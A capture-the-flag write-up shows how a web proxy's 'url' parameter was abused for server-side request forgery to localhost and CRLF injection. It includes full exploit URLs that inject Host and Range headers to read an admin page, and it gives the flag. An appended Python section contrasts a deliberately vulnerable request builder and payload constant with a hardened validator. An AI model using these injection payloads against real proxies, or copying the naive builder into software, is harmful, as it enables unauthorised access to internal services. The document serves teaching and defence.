In this task a web proxy is given:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php

It has a GET parameter “url”:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=google.it

It prints the response headers plus *part* of the body. We can easily reach the admin page with:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/

but since the whole body isn't printed we can't see the full response. After a bit of testing it turned out that CRLF injection was possible, so we can inject a Range: header and read the body slice by slice.

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/%20HTTP/1.0%0D%0AHost:%20localhost%0D%0ARange:%20bytes=372-425%0D%0AConnection:%20close%0D%0A%0D%0A
<!--if($_SERVER[HTTP_HOST]=="hackme")--></body>

Since it wants the Host header to be “hackme”, let's set it:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/ HTTP/1.0%0D%0AHost:%20hackme%0D%0ARange:%20bytes=88-127%0D%0AConnection: close%0d%0a%0D%0A

Flag: WH0_IS_SnUS_bI1G_F4N
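From the defender's side, an added example that is not part of the writeup (the proxy's PHP source is not shown on the page): an assumed reconstruction of a request builder that pastes the raw `url` parameter into the request line, beside a hardened version that rejects control characters and loopback/internal hosts and rebuilds the request from parsed parts. The `PAYLOAD` constant is constructed in the shape of the decoded query string above.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# CR, LF, TAB, SP and other control characters: none of these belong in a URL
_BAD_CHARS = re.compile(r"[\x00-\x20\x7f]")

# Constructed payload in the shape of the writeup's decoded `url` parameter
PAYLOAD = "localhost/admin/ HTTP/1.0\r\nHost: hackme\r\nRange: bytes=88-127\r\nConnection: close\r\n\r\n"

def build_request_naive(url: str) -> bytes:
    """Assumed reconstruction of the vulnerable proxy: the raw parameter is
    pasted into the request line, so CR/LF inside it start new header lines."""
    host, _, rest = url.partition("/")
    return f"GET /{rest} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()

def _is_internal_host(host: str) -> bool:
    """'localhost' and literal non-public IPs are refused. (DNS names that
    resolve to internal addresses need a resolver-side check, not done here.)"""
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return False  # not an IP literal

def reject_reason(url: str) -> "str | None":
    """Return why `url` is unsafe to proxy, or None if it passes."""
    if _BAD_CHARS.search(url):
        return "control or whitespace character in url"
    parts = urlsplit("http://" + url)
    if not parts.hostname:
        return "missing host"
    if _is_internal_host(parts.hostname):
        return "internal host refused"
    return None

def build_request_safe(url: str) -> bytes:
    """Hardened builder: validate first, then rebuild the request from parsed
    parts instead of echoing the caller's string."""
    reason = reject_reason(url)
    if reason:
        raise ValueError(reason)
    parts = urlsplit("http://" + url)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    netloc = parts.hostname if parts.port in (None, 80) else f"{parts.hostname}:{parts.port}"
    return f"GET {path} HTTP/1.0\r\nHost: {netloc}\r\nConnection: close\r\n\r\n".encode()
```

With the naive builder the injected lines land inside the outgoing request exactly as the writeup exploits them; the hardened builder refuses the same string before any socket is opened.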

Razor4x